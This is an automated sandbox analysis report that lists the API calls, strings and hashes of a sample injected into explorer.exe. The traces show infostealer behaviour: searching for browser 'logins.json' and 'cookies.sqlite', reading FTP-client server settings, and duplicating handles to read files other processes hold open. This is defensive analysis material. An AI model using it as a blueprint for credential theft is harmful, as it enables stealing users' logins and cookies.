                                                      • Opcode Fuzzy Hash: 00f92a919fe58cc2fcee024e23b5a8a25c02dcf311696da2a4ef3e62040a607d
                                                      • Instruction Fuzzy Hash: 02014271600008BFDB18CF90DC8AEFF77ACEB45344B10006EF900A3102EBB26E80D661

                                                      Control-flow Graph (rendered graph not recoverable from text)
                                                      APIs
                                                      • _alloca_probe.NTDLL ref: 000C431C
                                                      • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 000C4335
                                                      • RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000C4363
                                                      • RegCloseKey.ADVAPI32(?), ref: 000C43C8
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                        • Part of subcall function 000C418A: wsprintfW.USER32 ref: 000C4212
                                                        • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                        • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                      • RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000C43B9
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                      • String ID:
                                                      • API String ID: 801677237-0
                                                      • Opcode ID: e67c078470a900192e25afb11323ca0b6dbc5fdacec239f00ca5753cfcd10387
                                                      • Instruction ID: 60560412b716ae3b9e27860e48b4edd336cd4f6e1dd72b7b9317e541cc3f2f5f
                                                      • Opcode Fuzzy Hash: e67c078470a900192e25afb11323ca0b6dbc5fdacec239f00ca5753cfcd10387
                                                      • Instruction Fuzzy Hash: 4C1182B1104201BFE7199B10CC45EFF77EDFB88344F00862DF889D2151EB759E889A62

                                                      Control-flow Graph (rendered graph not recoverable from text)
                                                      APIs
                                                      • memset.NTDLL ref: 000CB8D5
                                                      • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 000CB96F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateFilememset
                                                      • String ID: psow$winOpen
                                                      • API String ID: 2416746761-4101858489
                                                      • Opcode ID: 947a24c0b705e832bcb66e80d866ba3e2d40e0e4410ba51a9bc00e7d755de889
                                                      • Instruction ID: b1bc4cd02a3218cecb152b020c0a59bdbdab4f0ce4d5c418b4c02a62c680d3a7
                                                      • Opcode Fuzzy Hash: 947a24c0b705e832bcb66e80d866ba3e2d40e0e4410ba51a9bc00e7d755de889
                                                      • Instruction Fuzzy Hash: 6271A271A04705AFC760DF28C882B5EBBE0FF88724F104A2DF9A497291D775D954CB92

                                                      Control-flow Graph (rendered graph not recoverable from text)
                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                      • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                        • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                        • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                      • String ID:
                                                      • API String ID: 217796345-0
                                                      • Opcode ID: 9436d70d346cafe1e67ebee69c697f253d39a676a69db6c91e8f54c2c14d1aa1
                                                      • Instruction ID: 4fabfa7a8463360d32696f745825540dc6acb7b390ca864aeb677513e9c86ef9
                                                      • Opcode Fuzzy Hash: 9436d70d346cafe1e67ebee69c697f253d39a676a69db6c91e8f54c2c14d1aa1
                                                      • Instruction Fuzzy Hash: 0C21A37220A341AFE7288B21CD04FBFB7E9EFCA754F144A2DF98592152E621CD409722
                                                      APIs
                                                      • RegOpenKeyW.ADVAPI32(?,?,?), ref: 000C1ED5
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C1F0C
                                                      • RegCloseKey.ADVAPI32(?), ref: 000C1F98
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                      • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C1F82
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                      • String ID:
                                                      • API String ID: 1077800024-0
                                                      • Opcode ID: 2826345298574355285d7029a784bd56e530572d793e1daea05b92344c6963a2
                                                      • Instruction ID: 312801df20b4c6f434773809451dbac0668461fae7b5efeb80e90be44095c6c3
                                                      • Opcode Fuzzy Hash: 2826345298574355285d7029a784bd56e530572d793e1daea05b92344c6963a2
                                                      • Instruction Fuzzy Hash: 75215C71208301BFD7099B21DC49EAFBBEDEF8A344F00892DF89992152DB75CD459B62
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000C1C46
                                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,000C3FA8), ref: 000C1C56
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C1C91
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000C1C76
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                      • String ID:
                                                      • API String ID: 2517252058-0
                                                      • Opcode ID: 196ca49efc339e49fbcb80f66674423d1aec03e716a55bf626a369164282273e
                                                      • Instruction ID: 8869eff0aedb4585e5cfe9fd9f846d2800c3cea474541fe7e1c897e5fe57ff3c
                                                      • Opcode Fuzzy Hash: 196ca49efc339e49fbcb80f66674423d1aec03e716a55bf626a369164282273e
                                                      • Instruction Fuzzy Hash: 2FF081312002187BD2241B25DC88FFF7A9CDB477B5F16061DF51592192EB539C458171
                                                      APIs
                                                        • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                        • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 000C2EE4
                                                      • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 000C2F54
                                                      • RegCloseKey.KERNEL32(?), ref: 000C2F62
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                      • String ID:
                                                      • API String ID: 1066184869-0
                                                      • Opcode ID: 7b09e8eb0fed5343c55e24a40b2658fb71e7aa9149e44799a0dc1090d42ace94
                                                      • Instruction ID: 37da3b80879da37bc67d4af4f669a1a9ad8ecdb0f523aff93c9fd86c8ed134e7
                                                      • Opcode Fuzzy Hash: 7b09e8eb0fed5343c55e24a40b2658fb71e7aa9149e44799a0dc1090d42ace94
                                                      • Instruction Fuzzy Hash: 09018631204254ABC7159F21DC05EEF7FA9EFCA390F10442DF85992153DE758985EBA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: ExitInitializeProcessUninitialize
                                                      • String ID:
                                                      • API String ID: 4175140541-0
                                                      • Opcode ID: 93250f317fa30003a126143051c953bb4adabc391b366acc3b35ba3fc31f24b9
                                                      • Instruction ID: e31af23fe5809eada00f867ee4f4d181e9e93fedf537769018753eb4e94eddb2
                                                      • Opcode Fuzzy Hash: 93250f317fa30003a126143051c953bb4adabc391b366acc3b35ba3fc31f24b9
                                                      • Instruction Fuzzy Hash: 5DC04C302851005BE6842BE05E1DB8D3598BB00712F008004F205854A1DB6244808622
                                                      APIs
                                                      • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 000C9FF8
                                                      Strings
                                                      • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 000CA00E
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateHeap
                                                      • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                      • API String ID: 10892065-982776804
                                                      • Opcode ID: 1c6f0276cd4ff51f4b56e16dd79262cf8212659a4eaafd5dd586f4daaafb6ded
• Instruction ID: e715bdd9b239edc05242f7aebd258c497018237035b896384139ad43ec015729
• Opcode Fuzzy Hash: 1c6f0276cd4ff51f4b56e16dd79262cf8212659a4eaafd5dd586f4daaafb6ded
• Instruction Fuzzy Hash: 1BF0F672704345BAE7305B94AC8CF6F67DCD795789F20043DF945D3240E2706C428631
APIs
  • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
  • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
• SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 000C1B16
  • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
  • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
  • Part of subcall function 000C19E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
  • Part of subcall function 000C19E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
  • Part of subcall function 000C19E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
  • Part of subcall function 000C19E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 000C1B40
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 2162223993-2036018995
• Opcode ID: 44cdefc82f74f0496f1b8048a4099373e33a50e793271cd61b873b5270bde947
• Instruction ID: ba6ff228695c27fa0e95587fa3488995e2f62e52786e8c68b30e74e3f32379bf
• Opcode Fuzzy Hash: 44cdefc82f74f0496f1b8048a4099373e33a50e793271cd61b873b5270bde947
• Instruction Fuzzy Hash: 7CF0B43670064827D615AB2ACC84FEF768ECBD33A6316002DF41993243EF23AC915668
APIs
• RtlAllocateHeap.NTDLL(02730000,00000000,?), ref: 000C9EB5
Strings
• failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 000C9ECD
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: AllocateHeap
• String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
• API String ID: 1279760036-667713680
• Opcode ID: da7f7630cc1bc5861019b0ae3798b5517accf1ea9870ffd5202e7ebeb74858b4
• Instruction ID: 75b594978964026cbc1719c2babe4ecb5b8b57bcb69ff72efe4b527b1532c5f2
• Opcode Fuzzy Hash: da7f7630cc1bc5861019b0ae3798b5517accf1ea9870ffd5202e7ebeb74858b4
• Instruction Fuzzy Hash: 1AE0CD376041107BC12257446C05F5F7764DBA4F10F010019F90453651C3309C5287A1
APIs
• CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
• CloseHandle.KERNEL32(00000000), ref: 000C1B8F
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID:
• API String ID: 3498533004-0
• Opcode ID: fb83b2a1d5a581adf8663e9681af5fe925a263dbb17b22ca4c3dc420efa1d5a3
• Instruction ID: 54c4544992f8f1923c99968fc4dc665176b3479511f2df21b352beb30d5b6e3c
• Opcode Fuzzy Hash: fb83b2a1d5a581adf8663e9681af5fe925a263dbb17b22ca4c3dc420efa1d5a3
• Instruction Fuzzy Hash: E8D0C771203230A2E5B923353D0CFEB2E6CDF03AB1F054618B60CD44D0E3218D8386E0
APIs
• HeapFree.KERNEL32(02730000,00000000,?), ref: 000C9EF8
Strings
• failed to HeapFree block %p (%lu), heap=%p, xrefs: 000C9F0E
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: FreeHeap
• String ID: failed to HeapFree block %p (%lu), heap=%p
• API String ID: 3298025750-4030396798
• Opcode ID: e6cf1ab3cadd53c12baf4be0df7fa84b55b2fd0425e933efba08a857e19a390b
• Instruction ID: f2441149ca70ee939b8fe1d96a8109030f2138eee9c13a8f6c809ff235a10f20
• Opcode Fuzzy Hash: e6cf1ab3cadd53c12baf4be0df7fa84b55b2fd0425e933efba08a857e19a390b
• Instruction Fuzzy Hash: CFD01276508241BBD6119B54AC45F2F77B9ABA5B00F44042CF104964A6D37554A3AB71
APIs
• RtlZeroMemory.NTDLL(?,00000018), ref: 000C12B5
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: MemoryZero
• String ID:
• API String ID: 816449071-0
• Opcode ID: 86b6d5fe5fb10f6ab2bd76b1a30088a970d9e36d2d68ea2653425e6a49665cd2
• Instruction ID: 7d68ba4ea28ba266cf2c5d120ee712bc90d8f352e3f6c553bbf1d70295c067c7
• Opcode Fuzzy Hash: 86b6d5fe5fb10f6ab2bd76b1a30088a970d9e36d2d68ea2653425e6a49665cd2
• Instruction Fuzzy Hash: 7511E3B5A01209AFDB24DFA9E984EEEB7FCEB49341B104029F945E6241D7319A40CB60
APIs
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 000C1684
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: CreateGlobalStream
• String ID:
• API String ID: 2244384528-0
• Opcode ID: 01aba32b51baa4027fc70d4f0020f550da9d05b624074335d5003e592ed6c4e6
• Instruction ID: 05cf46aa160d6539f5a83fde185778d3e14ae09a92089202867549f6638f93f9
• Opcode Fuzzy Hash: 01aba32b51baa4027fc70d4f0020f550da9d05b624074335d5003e592ed6c4e6
• Instruction Fuzzy Hash: DAC012301202219EE7601B209D09BCA36D8AF1A7A2F060929A081990C0E2F508C08A90
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,000C158A), ref: 000C1056
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 89054cb220ee4bceeb5c72cf07b93ffc29755a2f9b399f58ca72f882ddf7ed5f
• Instruction ID: 6ced8ba81a80a37abd1a230f096ca294a1d38799ad107e7e8dc3420ce8496934
• Opcode Fuzzy Hash: 89054cb220ee4bceeb5c72cf07b93ffc29755a2f9b399f58ca72f882ddf7ed5f
• Instruction Fuzzy Hash: 61A002F07D67007AFD6D5762AF1FF5529389744F02F114244B34D7C4D095E97540852D
APIs
• VirtualFree.KERNELBASE(00000000,00000000,00008000,000C4A5B,?,?,00000000,?,?,?,?,000C4B66,?), ref: 000C1065
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: a0841d3495debf9561b2fd3655bc4f405786c16b4d3aa47c1d731820491bf4e9
• Instruction ID: ea9c58852240352b8423ea4b75abe92339e5d7fb28c36c6259098a70c275598b
• Opcode Fuzzy Hash: a0841d3495debf9561b2fd3655bc4f405786c16b4d3aa47c1d731820491bf4e9
• Instruction Fuzzy Hash: F4A0027069070076EDB857205E0AF4526146780B01F2185447641A94D18AA6E084CA18
APIs
• CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C34C0
  • Part of subcall function 000C33C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 000C3401
• OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,000C37A8), ref: 000C34E9
  • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
  • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
• NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 000C351E
• NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 000C3541
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 000C3586
• DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 000C358F
• lstrcmpiW.KERNEL32(00000000,File), ref: 000C35B6
• NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 000C35DE
• StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 000C35F6
• StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 000C3606
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 000C361E
• GetFileSize.KERNEL32(?,00000000), ref: 000C3631
• SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 000C3658
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 000C366B
• ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 000C3681
• SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 000C36AD
• CloseHandle.KERNEL32(?), ref: 000C36C0
• CloseHandle.KERNEL32(00000000), ref: 000C36F5
  • Part of subcall function 000C1C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 000C1CC0
  • Part of subcall function 000C1C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 000C1CDA
  • Part of subcall function 000C1C9F: CloseHandle.KERNEL32(00000000), ref: 000C1CE6
• CloseHandle.KERNEL32(?), ref: 000C3707
Strings
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
• String ID: File
• API String ID: 3915112439-749574446
• Opcode ID: 85c91e519d110048cb2d754a10ec55df9a05838f1dba24dbab689c051b21d81c
• Instruction ID: e611380c84b8e800ad77419bd56dca3311fb691ad2757330bb5d87bb6a9d9bac
• Opcode Fuzzy Hash: 85c91e519d110048cb2d754a10ec55df9a05838f1dba24dbab689c051b21d81c
• Instruction Fuzzy Hash: 30619370214300BFD7649F20CC85FAFBBE9EB88754F10892CF946D62A2D776DA848B51
APIs
• memcmp.NTDLL ref: 00114502
• memcmp.NTDLL ref: 0011475F
• memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00114803
Strings
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
• API String ID: 231171946-1096842476
• Opcode ID: b4768a15e99ee3ef54f00a1cf1c222636a9990fab00678141a19e80a01d1a023
• Instruction ID: 0ae4a5864ec2897dd920d3a381ff2996a0ff21590144861ef0922d2565c29d7a
• Opcode Fuzzy Hash: b4768a15e99ee3ef54f00a1cf1c222636a9990fab00678141a19e80a01d1a023
• Instruction Fuzzy Hash: 18C1E4719083519BDB3CCF188490BFAB7D2AB9AB18F14053EF4D587292D724D8C5C796
APIs
  • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
  • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
  • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
  • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
• FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 000C2B3D
• lstrcmpiW.KERNEL32(?,001162CC), ref: 000C2B63
• lstrcmpiW.KERNEL32(?,001162D0), ref: 000C2B7B
  • Part of subcall function 000C19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C19C4
• StrStrIW.SHLWAPI(00000000,logins.json), ref: 000C2BE7
• StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 000C2C16
• FindNextFileW.KERNEL32(00000000,00000010), ref: 000C2C43
• FindClose.KERNEL32(00000000), ref: 000C2C52
Strings
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
• String ID: \*.*$cookies.sqlite$logins.json
• API String ID: 1108783765-3717368146
• Opcode ID: 816a57068c54ca00ef35ce7b1a04263d4aa104917f7177b53de6423b35f69afa
• Instruction ID: aafc04bb5f71a56d0c688c2381e3aaf9193852b0c09fd3335d0131dcf12101ad
• Opcode Fuzzy Hash: 816a57068c54ca00ef35ce7b1a04263d4aa104917f7177b53de6423b35f69afa
• Instruction Fuzzy Hash: 283190303043055BCB18AB709995FFE73DAAB89700B14893CB845D3693EF7ACD869252
APIs
  • Part of subcall function 000C6AAA: memset.NTDLL ref: 000C6AC5
• memset.NTDLL ref: 000E5F53
Strings
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: memset
• String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
• API String ID: 2221118986-594550510
• Opcode ID: 653fe322f454fb9f1dd5fa54b1c4e25b63d7f4155551440a66e3479997b0d3dc
• Instruction ID: 5d15dc0e707e90713246ede4f2e4703f2becd81512558dd9c05cf51217637031
• Opcode Fuzzy Hash: 653fe322f454fb9f1dd5fa54b1c4e25b63d7f4155551440a66e3479997b0d3dc
• Instruction Fuzzy Hash: 7DC1AD706087429FCB54DF26D480A6FB7E2BFD8740F04892DF855A7242DB32E956CB92
APIs
  • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
  • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 000C2127
• _alldiv.NTDLL(?,?,00989680,00000000), ref: 000C213A
• wsprintfA.USER32 ref: 000C214F
Strings
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
Similarity
• API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
• String ID: %li
• API String ID: 4120667308-1021419598
• Opcode ID: ca47e084cee357e27e5a0275cf18bf47dd6c277cb9b9ed8cc12eaad378895f9b
• Instruction ID: 87b622b6f1c7054b961d268ef61acbadafc26ef617cff2d966bd51cf342a7809
• Opcode Fuzzy Hash: ca47e084cee357e27e5a0275cf18bf47dd6c277cb9b9ed8cc12eaad378895f9b
• Instruction Fuzzy Hash: 22E0D83264121877C7243BB89D06FEF7B6DDB80B55F004195F900E2586E6738AA483D5
APIs
• CoCreateInstance.OLE32(001162B0,00000000,00000001,001162A0,?), ref: 000C445F
• SysAllocString.OLEAUT32(?), ref: 000C44AA
• lstrcmpiW.KERNEL32(RecentServers,?), ref: 000C456E
• lstrcmpiW.KERNEL32(Servers,?), ref: 000C457D
• lstrcmpiW.KERNEL32(Settings,?), ref: 000C458C
